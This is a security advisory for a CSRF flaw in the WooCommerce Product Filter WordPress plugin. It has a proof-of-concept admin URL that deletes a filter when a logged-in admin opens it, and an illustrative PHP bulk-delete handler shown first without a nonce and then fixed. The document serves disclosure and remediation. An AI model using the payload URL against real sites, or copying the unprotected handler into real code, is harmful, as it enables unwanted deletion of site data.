wpexploit - Erwan LR (WPScan) - WPEX-ID:30544377-B90D-4762-B38A-EC89BDA0DFDC
History: Mar 11, 2024 - 12:00 a.m.

WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF

Tags: woocommerce, product filter, version 1.4.4, csrf, filter deletion, admin, url exploit

AI Score: 6.9
Confidence: High
EPSS: 0
Percentile: 9.0%

Description: The plugin does not have a CSRF check in its bulk action, which could allow attackers to make logged-in users delete arbitrary filters via a CSRF attack, provided they know the related filter slugs.

Making a logged-in admin open the URL below causes them to delete the filter with the slug test1:

https://example.com/wp-admin/admin.php?page=wpf_search&action=delete&paged=1&wpf_post[]=test1&action2=delete
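The root cause in the advisory is a bulk-action handler that acts on `wpf_post[]` as soon as a logged-in user's request arrives, with nothing proving the user intended the action. The snippet below is an added illustration, not code from the WooCommerce Product Filter plugin: a hypothetical bulk-delete handler in the shape the advisory describes, followed by the same handler hardened with a WordPress nonce. The page slug `wpf_search` and the `wpf_post[]` parameter come from the advisory URL; the nonce action `wpf_bulk_delete`, the field name `wpf_nonce`, the capability `manage_options` and the helper `wpf_delete_filter_by_slug()` are assumptions for this example.

```php
<?php
// Added illustration, not code from the WooCommerce Product Filter plugin.
// Hypothetical bulk-action handler for the admin page "wpf_search"
// (slug taken from the advisory URL); filter slugs arrive in wpf_post[].

// BEFORE (the pattern the advisory describes): the handler trusts the
// request as long as the user is logged in with the right capability.
// A forged cross-site request carries the victim's cookies, so the
// capability check alone does not show the user chose to delete anything.
function wpf_handle_bulk_action_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        return;
    }
    $action = isset( $_REQUEST['action'] ) ? $_REQUEST['action'] : '';
    if ( 'delete' === $action && ! empty( $_REQUEST['wpf_post'] ) ) {
        foreach ( (array) $_REQUEST['wpf_post'] as $slug ) {
            wpf_delete_filter_by_slug( sanitize_key( $slug ) ); // hypothetical helper
        }
    }
}

// AFTER: require a nonce bound to this bulk action. The nonce is derived
// from the user's session, so a third-party site cannot produce it, and
// check_admin_referer() calls wp_die() when it is missing or invalid.
// Action name and field name are assumptions for this example.
function wpf_handle_bulk_action_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    $action = isset( $_REQUEST['action'] ) ? $_REQUEST['action'] : '';
    if ( 'delete' !== $action || empty( $_REQUEST['wpf_post'] ) ) {
        return;
    }
    // Stops here for a link the victim was tricked into opening: the
    // delete loop below is never reached without a valid nonce.
    check_admin_referer( 'wpf_bulk_delete', 'wpf_nonce' );

    foreach ( (array) $_REQUEST['wpf_post'] as $slug ) {
        wpf_delete_filter_by_slug( sanitize_key( $slug ) );
    }
}

// Rendering side of the fixed version: the bulk form must carry the nonce
// so legitimate submissions from the admin page pass the check above.
function wpf_render_bulk_form( array $filter_slugs ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=wpf_search' ) ) . '">';
    wp_nonce_field( 'wpf_bulk_delete', 'wpf_nonce' );
    foreach ( $filter_slugs as $slug ) {
        printf(
            '<label><input type="checkbox" name="wpf_post[]" value="%s"> %s</label><br>',
            esc_attr( $slug ),
            esc_html( $slug )
        );
    }
    echo '<input type="hidden" name="action" value="delete">';
    submit_button( 'Delete selected' );
    echo '</form>';
}
```

Two design notes. A plugin built on `WP_List_Table` gets the nonce for free: the table emits `_wpnonce` with the action `bulk-{plural}`, and the handler verifies it with `check_admin_referer( 'bulk-' . $this->_args['plural'] )`. Separately, the advisory's proof of concept is a plain GET link; switching the form to POST (as above) and ignoring `action=delete` on GET removes the link-based delivery path, but the nonce is what actually closes the CSRF, because a POST can be forged just as easily from an attacker-controlled page.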
